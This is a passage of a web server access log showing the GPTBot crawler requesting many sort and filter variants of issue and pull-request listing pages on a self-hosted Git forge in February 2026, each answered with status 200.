+https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&sort=recentupdate&state=closed&type=all" -[17/Feb/2026:19:14:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10038] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:14:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10201] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:14:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:14:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10203] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:14:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10172] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&state=all&type=all" -[17/Feb/2026:19:14:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10006] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&state=all&type=all" -[17/Feb/2026:19:14:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10170] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&sort=latest&state=closed&type=all" -[17/Feb/2026:19:14:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10051] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:14:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10042] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:14:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10043] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:14:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10174] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:14:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10006] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:14:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10010] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:14:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:14:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10065] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:15:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10045] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:15:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10017] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:15:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10017] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:15:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10175] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:15:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10017] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:15:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10056] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:15:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10049] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:15:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10214] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:15:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10222] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:15:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10229] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:15:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10041] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:15:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10010] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:19:15:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10006] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:15:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10012] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:15:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10178] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:15:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10172] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:15:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10048] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:15:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10171] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:15:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10168] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:15:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10051] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:15:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10048] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:15:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10051] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:15:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10183] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:15:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10225] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:15:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10186] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:15:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10060] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:15:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10014] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:15:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10009] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:15:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:15:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10215] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:15:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10015] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:15:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10018] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:15:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10014] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:15:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10020] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:19:15:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10012] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:15:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10168] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:15:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10179] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:15:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10059] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:15:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10015] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:15:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10222] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:15:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10019] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:15:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10173] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 